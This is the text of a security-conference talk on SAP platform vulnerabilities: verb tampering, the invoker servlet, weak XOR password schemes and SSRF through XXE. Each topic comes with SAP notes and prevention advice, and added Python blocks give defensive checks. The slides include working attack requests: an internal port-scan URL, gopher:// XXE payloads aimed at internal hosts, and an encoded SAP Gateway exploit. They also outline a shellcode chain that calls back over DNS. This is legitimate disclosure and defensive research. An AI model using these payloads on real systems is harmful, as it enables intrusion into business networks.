Invest in security to secure investments
Architecture vulnerabilities in SAP platforms: History and future trends.
Alexander Polyakov, CTO, ERPScan
Dmitry Evdokimov, Principal Researcher, ERPScan
About ERPScan
• The only 360-degree SAP security solution: ERPScan Security Monitoring Suite for SAP
• Leader by the number of acknowledgements from SAP (150+)
• 60+ presentations at key security conferences worldwide
• 25 awards and nominations
• Research team: 20 experts with experience in different areas of security
• Headquarters in Palo Alto (US) and Amsterdam (EU)
SAP
• The most popular business application
• More than 185000 customers
• 74% of Forbes 500
Agenda
• Intro
  – The history of SAP security
  – Trends
  – Common SAP issues
• Architecture problems and uncommon issues
• Advice for developers and future trends
• Conclusion
3 areas of SAP Security
2010 – Application platform security
Prevents unauthorized access by both insiders and remote attackers
Solution: vulnerability assessment and monitoring
2008 – ABAP code security
Prevents attacks or mistakes made by developers
Solution: code audit
2002 – Business logic security (SOD)
Prevents attacks or mistakes made
Solution: GRC
Talks about SAP security
(Chart: number of talks per year, 2006–2012, on a 0–35 scale)
Most popular:
• BlackHat
• HITB
• Troopers
• RSA
• Source
• DeepSec
• etc.
SAP Security notes
(Chart: number of SAP Security Notes per year, 2001–2012, on a 0–900 scale)
By October 2012, more than 2500 notes
Business Risks
Espionage
• Stealing financial information
• Stealing corporate secrets
• Stealing suppliers and customers lists
• Stealing HR data
Sabotage
• Denial of service
• Modification of financial reports
• Access to the technology network (SCADA) through trust relations
Fraud
• False transactions
• Modification of master data
• Etc.
SAP vulnerabilities by type
(Chart: number of vulnerabilities per type, on a 0–350 scale)
12 – SQL injection
11 – BOF
10 – Denial of service
9 – Remote code execution
8 – Verb tampering
7 – Code injection vulnerability
6 – Hard-coded credentials
5 – Unauthorized usage of application
4 – Information disclosure
3 – Missing auth check
2 – XSS / Unauthorised modification of
1 – Directory traversal
Stats from:
• 1Q 2012
• 1Q 2010
• 4Q 2009
But what about the other 20%?
Architecture and unusual issues
Authentication bypass
1. Verb tampering
2. Invoker servlet
Encryption
3. Storage – SAP GUI
4. Authentication – P4
5. Transfer – RFC, DIAG
SSRF
6. Port scan
7. Command execution
8. Security bypass
Authentication
ex1. Invoker Servlet: Description
• Rapidly calls servlets by their class name
• Published by SAP in their security guides
• Possible to call any servlet from an application
• Even if it is not declared in WEB.XML
Can be used for authentication bypass
ex1. Invoker Servlet: Details
<servlet>
  <servlet-name>CriticalAction</servlet-name>
  <servlet-class>com.sap.admin.Critical.Action</servlet-class>
</servlet>
<servlet-mapping>
  <servlet-name>CriticalAction</servlet-name>
  <url-pattern>/admin/critical</url-pattern>
</servlet-mapping>
<security-constraint>
  <web-resource-collection>
    <web-resource-name>Restrictedaccess</web-resource-name>
    <url-pattern>/admin/*</url-pattern>
    <http-method>GET</http-method>
  </web-resource-collection>
  <auth-constraint>
    <role-name>admin</role-name>
  </auth-constraint>
</security-constraint>
What if we call /servlet/com.sap.admin.Critical.Action?
ex1. Invoker Servlet: Prevention
For users:
• Update to the latest patches: 1467771, 1445998
• "EnableInvokerServletGlobally" must be "false"
• Check all WEB.XML files
  – with the free ERPScan WEBXML checker
  – manually
For developers:
• Follow the "security by default" practice
2. VERB Tampering
ex2. Verb Tampering
<security-constraint>
  <web-resource-collection>
    <web-resource-name>Restrictedaccess</web-resource-name>
    <url-pattern>/admin/*</url-pattern>
    <http-method>GET</http-method>
  </web-resource-collection>
  <auth-constraint>
    <role-name>admin</role-name>
  </auth-constraint>
</security-constraint>
What if we use HEAD instead of GET?
ex2. Verb tampering: Details
• CTC: an interface for managing the J2EE engine
• Can be accessed remotely
• Can run user management actions:
  – Add users
  – Add to groups
  – Run OS commands
  – Start/stop J2EE
Over 40 other components found to be vulnerable
ex2. Verb tampering: More details
If patched, can be bypassed by the Invoker servlet!
ex2. Verb tampering: Prevention
For users:
• Install SAP notes 1503579, 1616259
• Install the other SAP notes about verb tampering
• Disable the Invoker Servlet
• Disable the applications that are not necessary
• Check all WEB.XML files
  – with the free ERPScan WEBXML checker
  – manually
For developers:
• The issue was known in 2008 and patched in many application servers. Learn from others' mistakes.
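Both descriptor conditions from ex1 and ex2 can be checked mechanically before deployment. The script below is an added example written for this page (it is not ERPScan's WEBXML checker and not SAP code). It parses a constructed web.xml modelled on the slides, flags every security-constraint that names explicit http-methods (HEAD or any other verb then reaches the resource without the auth-constraint) and every servlet whose only protection is a url-pattern (the /servlet/<class> invoker path ignores url-patterns). The EnableInvokerServletGlobally check takes a plain dict of the engine's servlet service properties; how that dict is obtained is an assumption outside the example.

```python
import xml.etree.ElementTree as ET

# Constructed sample modelled on the descriptor shown on the ex1/ex2 slides:
# the admin constraint lists GET only, and CriticalAction is protected purely by its url-pattern.
SAMPLE_WEB_XML = """<web-app>
  <servlet>
    <servlet-name>CriticalAction</servlet-name>
    <servlet-class>com.sap.admin.Critical.Action</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>CriticalAction</servlet-name>
    <url-pattern>/admin/critical</url-pattern>
  </servlet-mapping>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>Restrictedaccess</web-resource-name>
      <url-pattern>/admin/*</url-pattern>
      <http-method>GET</http-method>
    </web-resource-collection>
    <auth-constraint>
      <role-name>admin</role-name>
    </auth-constraint>
  </security-constraint>
</web-app>
"""

# Same descriptor with the http-method element removed: the constraint now covers every verb.
HARDENED_WEB_XML = SAMPLE_WEB_XML.replace("<http-method>GET</http-method>", "")


def _local(tag):
    """Drop a namespace prefix ({uri}name -> name) so namespaced descriptors are handled too."""
    return tag.rsplit("}", 1)[-1]


def _texts(el, name):
    return [c.text.strip() for c in el if _local(c.tag) == name and c.text]


def _first(el, name):
    found = _texts(el, name)
    return found[0] if found else None


def _under(pattern, constraint):
    """True if a servlet url-pattern lies inside a constraint pattern such as /admin/*."""
    if constraint.endswith("/*"):
        return pattern.startswith(constraint[:-1])
    return pattern == constraint


def audit_web_xml(xml_text):
    """Return a list of findings (strings) for one deployment descriptor."""
    root = ET.fromstring(xml_text)
    findings, servlets, mappings, protected = [], {}, {}, []
    for el in root:
        tag = _local(el.tag)
        if tag == "servlet":
            servlets[_first(el, "servlet-name")] = _first(el, "servlet-class")
        elif tag == "servlet-mapping":
            mappings[_first(el, "servlet-name")] = _first(el, "url-pattern")
        elif tag == "security-constraint":
            for coll in el:
                if _local(coll.tag) != "web-resource-collection":
                    continue
                patterns, methods = _texts(coll, "url-pattern"), _texts(coll, "http-method")
                protected.extend(patterns)
                if methods:  # listing methods protects only those; HEAD, POST, ... pass through
                    findings.append("verb-tampering: %s is protected for %s only"
                                    % (", ".join(patterns), ", ".join(methods)))
    for name, pattern in mappings.items():
        # A url-pattern constraint says nothing about /servlet/<class>, the invoker servlet path
        if pattern and any(_under(pattern, p) for p in protected):
            findings.append("invoker-servlet: %s also reachable as /servlet/%s, outside %s"
                            % (name, servlets.get(name), pattern))
    return findings


def invoker_servlet_disabled(service_properties):
    """The slide's setting check. `service_properties` is an assumed dict of the engine's
    servlet service settings; an absent property is reported as not disabled."""
    value = service_properties.get("EnableInvokerServletGlobally")
    return value is not None and str(value).strip().lower() == "false"


if __name__ == "__main__":
    for line in audit_web_xml(SAMPLE_WEB_XML):
        print(line)
    print("hardened:", audit_web_xml(HARDENED_WEB_XML))
    print("invoker disabled:", invoker_servlet_disabled({"EnableInvokerServletGlobally": "false"}))
```

Run it against every WEB.XML of an application as the slides advise; the invoker-servlet finding stays relevant for each descriptor until the global setting is confirmed false, which is why the script reports both independently.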
Encryption
Where it can be used
While authenticating (example 5)
While transmitting (example 4)
While storing (example 3)
ex3. SAP GUI encryption
• SAP FrontEnd can save encrypted passwords in shortcuts
• Shortcuts are stored in .sap files
• The password uses a byte-XOR algorithm with a "secret" key
• The key has the same value for every installation of SAP GUI
• Any password can be decrypted
ex3. SAP GUI encryption: Prevention
For users:
• Disable password storage in the GUI
For developers:
• Use at least a random salt depending on the installation
• Do not use XOR in the future
ex4. Insecure password encryption in P4
P4: a protocol used by the Visual Admin app
By default, data is transmitted in cleartext
But the password is encrypted
ex4. Insecure password encryption in P4
/* The P4 password "encryption" routine as shown on the slide; the wrapping method
   signature is added so that the fragment compiles. A running XOR seeded with a
   constant: the same output on every installation, and reversible without any key. */
static char[] encryptPassword(char[] data) {
    char mask = 43690;   // 0xAAAA, the fixed "key"
    char check = 21845;  // 0x5555, used for the trailing check value
    char[] result = new char[data.length + 1];

    for (int i = 0; i < data.length; ++i) {
        mask = (char)(mask ^ data[i]);   // each output char is the XOR of all input so far
        result[i] = mask;
    }
    result[data.length] = (char)(mask ^ check);

    return result;
}
ex4. Insecure password encryption in P4: Prevention
For users:
• Use SSL to secure all the data transmitted over server-server and server-client connections: http://help.sap.com/saphelp_nwpi71/helpdata/de/14/ef2940cbf2195de10000000a1550b0/content.htm
For developers:
• Use known and approved authentication schemes such as CRAM-MD5 (at least, if it is broken, you will not be the one)
ex5. Password transmission (DIAG/RFC)
DIAG – not an encryption protocol; also broken
RFC encryption – broken in 2007 (XOR)
Both were already covered many times
ex5. Password transmission (DIAG/RFC)
For users:
• Use SNC
For developers:
• XOR is BAD
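What ex3, ex4 and ex5 have in common is XOR with a constant that every installation shares. The Python below is an added example, not code from the presentation or from SAP: it ports the P4 routine from the ex4 slide, shows that it inverts without any key, and beside it implements the CRAM-MD5 challenge-response that the ex4 prevention slide recommends (RFC 2195: HMAC-MD5 of a server challenge, keyed with the password). The challenge format and the sample credentials are constructed for the example.

```python
import hashlib
import hmac
import secrets

# Constants from the P4 routine on the slide (Java 'char' values 43690 and 21845).
P4_MASK_SEED = 0xAAAA
P4_CHECK_SEED = 0x5555


def p4_mask(password):
    """Python port of the slide's routine: a running XOR seeded with a constant.
    Returns the list of 16-bit output values (the Java char[] result)."""
    mask, out = P4_MASK_SEED, []
    for ch in password:
        mask = (mask ^ ord(ch)) & 0xFFFF  # Java char arithmetic wraps at 16 bits
        out.append(mask)
    out.append((mask ^ P4_CHECK_SEED) & 0xFFFF)  # trailing check value
    return out


def p4_unmask(masked):
    """Inverse of p4_mask. No secret is needed: every plaintext char is the XOR of two
    consecutive output values, and the first one is XORed with the public seed."""
    prev, chars = P4_MASK_SEED, []
    for value in masked[:-1]:
        chars.append(chr((value ^ prev) & 0xFFFF))
        prev = value
    if ((prev ^ P4_CHECK_SEED) & 0xFFFF) != masked[-1]:
        raise ValueError("check value mismatch")
    return "".join(chars)


def cram_md5_challenge():
    """Server side: a fresh, unpredictable challenge per attempt (format constructed here)."""
    return ("<%s@server.invalid>" % secrets.token_hex(8)).encode()


def cram_md5_response(username, password, challenge):
    """Client side (RFC 2195): HMAC-MD5 over the challenge, keyed with the password.
    The password never appears on the wire, and a captured digest is useless for a
    later attempt because the challenge changes."""
    digest = hmac.new(password.encode(), challenge, hashlib.md5).hexdigest()
    return "%s %s" % (username, digest)


def cram_md5_verify(response, password, challenge):
    """Server side: recompute with the stored secret and compare in constant time."""
    username, _, digest = response.partition(" ")
    expected = hmac.new(password.encode(), challenge, hashlib.md5).hexdigest()
    return username, hmac.compare_digest(digest, expected)


if __name__ == "__main__":
    masked = p4_mask("Secret1")
    print("P4 output:", ["%04x" % v for v in masked])
    print("recovered without any key:", p4_unmask(masked))
    chal = cram_md5_challenge()
    resp = cram_md5_response("admin", "Secret1", chal)
    print("CRAM-MD5 response:", resp, "->", cram_md5_verify(resp, "Secret1", chal))
```

The contrast is the point of the slides: the P4 output is a function of the password alone, so anyone who sees the bytes can run p4_unmask, whereas the CRAM-MD5 digest is a function of the password and a one-time challenge, so seeing it on the wire gives neither the password nor a replayable token.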
SSRF
SSRF Basics
• We send Packet A to Service A
• Service A initiates Packet B to Service B
• The services can be on the same host or on different hosts
• We can manipulate some fields of Packet B within Packet A
• Various SSRF attacks depend on how many fields we can control in Packet B
(Diagram: Packet A → Service A → Packet B → Service B)
SSRF at a glance
(Diagram repeating the SSRF basics above: Packet A arrives from the corporate network, and Service A sends Packet B into the secure network)
What can be done by SSRF?
Security bypass (example 8)
Code execution (example 7)
Port scanning (example 6)
Let's look deeper
ex6. Remote port scan by SSRF
• It is possible to scan the internal network from the Internet
• Authentication is not required
• SAP NetWeaver J2EE engine's ipcpricing is vulnerable
  o And at least 3 similar vulnerabilities in other services
• /ipcpricing/ui/BufferOverview.jsp?server=172.16.0.13&port=31337&password=&dispatcher=&targetClient=&view=
ex6. Remote port scan with SSRF: Demo
(Screenshots: the response differs for a closed port, an HTTP port and a SAP port)
ex7. Code execution with SSRF
• DilbertMSG web service
• Uses SOAP XML
• For testing purposes
• Shipped with SAP PI < 7.1 by default
• Accessed without authorization
• Patched in SAP Security Note 1707494
ex7. XXE tunneling: Gopher URI scheme
What will happen?
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY date SYSTEM "gopher://172.16.0.1:3300/AAAAAAAAA" >]>
<foo>&date;</foo>
ex7. XXE Tunneling details
(Diagram: Server A (Portal or XI) at 192.168.0.1; Server B (ERP, HR, BW etc.) at 172.16.0.1, port 3300)
Packet A, sent to Server A:
POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1
Host: 192.168.0.1:8000

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY date SYSTEM "gopher://172.16.0.1:3300/AAAAAAAAA" >]>
<foo>&date;</foo>
What arrives at Server B on port 3300: AAAAAAAAA (the same as typing it into telnet 172.16.0.1 3300)
ex7. XXE Tunneling to Buffer Overflow
• A buffer overflow vulnerability found by Virtual Forge in the ABAP Kernel (fixed in SAP note 1487330)
• An example of any other vulnerability could be here
• Hard to exploit because it requires calling an RFC function which calls the Kernel function
• But even such a complex attack can be exploited by SSRF
ex7. XXE Tunneling to Buffer Overflow (Step 1)
• We exploit it via WEBRFC
• Can be fixed by SAP notes: 1394100, 1536640, 1528822, 1453457
• According to our report, WEBRFC is installed in 40% of NetWeaver ABAP systems, even on the Internet
ex7. XXE Tunneling to Buffer Overflow (Step 2)
• Shellcode size is limited to 255 bytes (the name parameter)
• As we don't have a direct connection to the Internet from the vulnerable system, we want to use DNS tunneling shellcode to connect back
• But the XML engine saves some XML data in RWX memory
• So we can use an egghunter
• Any shellcode can be uploaded
ex7. XXE Tunneling to Buffer Overflow: Packet B
POST /sap/bc/soap/rfc?sap-client=000 HTTP/1.1
Authorization: Basic U1FQKjowMjA3NTk3==
Host: company.com:80
User-Agent: ERPSCAN Pentesting tool v 0.2
Content-Type: text/xml; charset=utf-8
Cookie: sap-client=000
Content-Length: 2271

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><SOAP-ENV:Body><m:RSPO_R_SAPGPARAM xmlns:m="urn:sap-com:document:sap:rfc:functions"><HEAP_EGG>dsecdsec[binary egg data, not reproducible from the slide]</HEAP_EGG><NAME>[binary payload and padding, not reproducible from the slide]</NAME></m:RSPO_R_SAPGPARAM></SOAP-ENV:Body></SOAP-ENV:Envelope>
ex7. XXE Tunneling to Buffer Overflow (Step 3)
Packet A:
POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1
Host: sapserver.com:80
Content-Length: 7730

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY date SYSTEM "gopher://[URL-encoded Packet B]" >]>
<foo>&date;</foo>
• The next step is to pack Packet B into Packet A
• We need to insert non-printable symbols
• God bless gopher; it supports URL encoding like HTTP
• It will also help to evade detection of the attack by IDS systems
ex7. XXE Tunneling to Buffer Overflow: Final step
(Diagram: Server A on the Internet (SAP XI), http://company.com; Server B in the DMZ (SAP ERP), 172.16.0.1, port 8000, WebRFC service)
Packet A, sent to Server A:
POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1
Host: sapserver.com:80

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY date SYSTEM "gopher://[packetB]" >]>
<foo>&date;</foo>
Packet B – delivered to the WebRFC service on port 8000 of Server B
Shellcode service with DNS payload
Packet C – Command and Control response to the attacker over the DNS protocol, which is allowed for outbound connections
Full control over the internal system through the Internet
ex8. SSRF to Security bypass: SAP Gateway
• SAP Gateway: remote management of SAP
• Different attacks are possible, like registering a fake RFC service
• Currently secured by the gw/monitor option:
  0: No monitor commands are accepted
  1: Only monitor commands from the local gateway monitor are accepted
  2: Monitor commands from local and remote monitors are accepted
• With XXE Tunneling, we can act like a local monitor, bypassing the restrictions
• For example, we can change SAP Gateway parameters
SAP Gateway server security bypass: Exploit
The Message Server is vulnerable as well
POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1
Host: 172.16.10.63:8001
Content-Length: 621

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE in [<!ENTITY li SYSTEM "gopher://172.16.0.1:3301/a%00%00%00%7A%43%4F%4E%54%00%02%00%7A%67%77%2F%6D%61%78%5F%73%6C%65%65%70%00%00%00%00%79%02%00%00%00%00%00%00%28%DE%D9%00%79%5F%00%74%08%B5%38%7C%00%00%00%00%44%DE%D9%00%00%00%00%00%00%00%00%00%70%DE%D9%00%00%00%00%00%EA%1E%43%00%08%38%38%00%00%00%00%00%10%44%59%00%18%44%59%00%00%00%00%00%64%DE%D9%00%79%5F%00%74%08%B5%38%7C%00%00%00%00%79%DE%D9%00%00%00%00%7A%DE%D9%00%B3%56%35%7C%48%EF%38%7C%5F%57%35%7C%0A%00%00%00%B8%EE">]><dmsg:generate xmlns:dmsg='http://sap.com/fun/dilbert/msg' title='&li;'>1</dmsg:generate>
SSRF: Prevention
For users:
• Disable unnecessary applications (such as XML interfaces)
• Install SAP notes: 1548548, 1545883, 1503856, 948851, 1545883
• Don't rely on firewalls only
For developers:
• Take care not only about input data but also about output data
• Filters must be in every place where it is possible to call remote systems
• Don't trust localhost
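The three SSRF examples share one root cause: the server builds a connection (ipcpricing's server and port parameters in ex6, the gopher:// entity in the DilbertMSG request in ex7 and ex8) from data the caller controls. The Python below is an added example for the developer points above, not code from the presentation or from SAP. It does two things: it parses an untrusted SOAP body with expat configured to refuse DOCTYPEs, entity declarations and external entity references before anything is resolved, and it checks an outbound target against a scheme allowlist, the internal address ranges and an explicit host allowlist, so that 172.16.0.13:31337 and gopher://172.16.0.1:3300 from the slides are refused. The sample bodies and the allowlisted host are constructed.

```python
import ipaddress
import xml.parsers.expat as expat
from urllib.parse import urlsplit


class BlockedRequest(Exception):
    """Raised when untrusted input would make the server open a connection it should not."""


# Constructed request body in the shape shown on the XXE tunneling slides (addresses are the
# slides' examples). Nothing is contacted: the parser refuses before the entity is resolved.
XXE_PAYLOAD = b"""<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
 <!ELEMENT foo ANY >
 <!ENTITY date SYSTEM "gopher://172.16.0.1:3300/AAAAAAAAA" >]>
<foo>&date;</foo>"""

CLEAN_PAYLOAD = b'<?xml version="1.0"?><foo><bar>hello</bar></foo>'


def parse_untrusted_xml(data):
    """Parse with expat while refusing any DOCTYPE, entity declaration or external entity
    reference. Returns the element names seen, standing in for the application's own handling."""
    parser = expat.ParserCreate()
    seen = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise BlockedRequest("DOCTYPE rejected: %s" % name)

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        raise BlockedRequest("entity declaration rejected: %s -> %s" % (name, sysid))

    def on_external_ref(context, base, sysid, pubid):
        raise BlockedRequest("external entity fetch rejected: %s" % sysid)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.StartElementHandler = lambda name, attrs: seen.append(name)
    parser.Parse(data, True)
    return seen


def xml_request_accepted(data):
    """Boolean wrapper: True only if the body parsed without touching any external resource."""
    try:
        parse_untrusted_xml(data)
        return True
    except (BlockedRequest, expat.ExpatError):
        return False


ALLOWED_SCHEMES = {"http", "https"}


def outbound_target_allowed(url, allowed_hosts):
    """Check to run wherever the server builds a request from caller-supplied data (the slide's
    point: filter output, not only input). Returns (allowed, reason). gopher:// and other
    schemes are refused, as are literal loopback, private, link-local and reserved addresses,
    and only hosts on the caller-supplied allowlist pass."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, "scheme %r not allowed" % parts.scheme
    host = parts.hostname
    if not host:
        return False, "no host in URL"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None  # a hostname; its resolved address must be re-checked just before connecting
    if ip is not None and (ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_reserved):
        return False, "internal address %s refused" % ip
    if host not in allowed_hosts:
        return False, "host %r not on the allowlist" % host
    return True, "ok"


if __name__ == "__main__":
    print("clean body accepted:", xml_request_accepted(CLEAN_PAYLOAD))
    print("XXE body accepted:", xml_request_accepted(XXE_PAYLOAD))
    # The ex6 ipcpricing parameters, server=172.16.0.13 and port=31337, through the same check
    print(outbound_target_allowed("http://172.16.0.13:31337/", {"partner.example"}))
    print(outbound_target_allowed("gopher://172.16.0.1:3300/", {"partner.example"}))
    print(outbound_target_allowed("https://partner.example/api", {"partner.example"}))
```

The address check covers literal IPs only; a hostname that resolves to an internal address has to be caught by resolving it and re-checking the result immediately before the socket is opened, which the example leaves to the caller. Rejecting DOCTYPEs outright is the simplest rule for an interface that never needs DTDs, and it removes the whole class of entity tricks rather than one URI scheme.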
Advice for SAP
Some other cases
New technologies = new risks (for developers)
Double patches (for the remediation team)
Unusual places for known vulnerabilities (for QA)
Unusual XSS in BAPI (for QA)
• The SAP BAPI transaction fails to sanitize input properly
• Possible to inject JavaScript code
• No cookies, but we can make a link to a fake SMB server
• SAP GUI clients usually use Windows
• Windows credentials will be transferred to the attacker's host
Unusual XSS in BAPI: Prevention
For users:
• Apply patch 1569550
For developers:
• XSS is not only about cookie stealing
• In SAP, well-known old things can appear in an unusual way
Double patches (for Remediation)
There were some patches that failed to solve the problem in full
• TH_GREP
  – Patched on Linux but not on Windows
  – It doesn't matter if it is more or less possible to exploit
  – Patch it carefully
• Portal directory traversal
  – Directory traversal is not about filtering ../
  – The idea is that UNAUTHORIZED ACCESS should be prevented
• Multiple XSS in one script
  – Sometimes there are patches for one parameter but not for the others
  – A very bad situation when information about the patched parameter goes public
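The Portal directory traversal point above, that the fix is not filtering ../ but preventing access outside the intended directory, can be shown in a few lines. The Python below is an added example, not code from the presentation or from SAP; the document root and the inputs are constructed, and no file is read. It contrasts a string filter that strips ../ with a check that canonicalises the final path and verifies that it stays under the root.

```python
import os

DOC_ROOT = "/srv/portal/docs"  # assumed document root; paths are decided, nothing is opened


def strip_dotdot(user_path):
    """The kind of 'fix' the slide warns against: delete '../' and hope. A single pass turns the
    constructed input '....//etc/passwd' into '../etc/passwd', so the filter creates what it removes."""
    return user_path.replace("../", "")


def resolve_under_root(root, user_path):
    """Decide by where the canonical path lands, not by what the string looks like: resolve '..'
    and symlinks with realpath and require the result to stay inside `root`.
    Returns the absolute path or raises PermissionError."""
    root = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root, user_path.lstrip("/\\")))
    if os.path.commonpath([root, candidate]) != root:
        raise PermissionError("refused: %s resolves outside %s" % (user_path, root))
    return candidate


def is_allowed(root, user_path):
    """Boolean form of resolve_under_root for checks and tests."""
    try:
        resolve_under_root(root, user_path)
        return True
    except PermissionError:
        return False


if __name__ == "__main__":
    for p in ["reports/q1.pdf", "../../etc/passwd", "....//etc/passwd"]:
        filtered = strip_dotdot(p)
        print("%-20s filtered=%-18s allowed=%s" % (p, filtered, is_allowed(DOC_ROOT, filtered)))
```

The canonical check is indifferent to how the input was spelled: whatever survives the string filter, or bypasses it, is judged only by the directory it finally points at, which is the property the slide says a patch has to guarantee.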
New technologies = new risks (for developers)
• SAP is buying many systems
  – Their security testing processes may be different, or there can be no processes
• SAP is investing in new technologies and areas
  – Cloud
  – Mobile
  – In-Memory
• There can be new security issues in those areas, not known before
Conclusion
It is possible to protect yourself from these kinds of issues, and we are working closely with SAP to keep the customers secure
It's all in your hands:
• SAP Guides
• Regular security assessments
• ABAP code review
• Monitoring technical security
• Segregation of Duties
Future work
Many of the researched issues cannot be disclosed now because of our good relationship with the SAP Security Response Team, whom I would like to thank for cooperation. However, if you want to be the first to see new attacks and demos, follow us at @erpscan and attend future presentations:
• 2–3 November – HashDays (Switzerland, Lucerne)
• 9 November – POC (Korea, Seoul)
• 20 November – ZeroNights (Russia, Moscow)
• 29 November – DeepSEC (Austria, Vienna)
Thanks to all our crew who helped in this research: Dmitry Chastukhin, Dmitriy Evdokimov, Alexey Sintsov, Alexey Tyurin, Pavel Kuzmin, Evgeny Neyolov, Nikolay Mescherin, Alexander Minozhenko.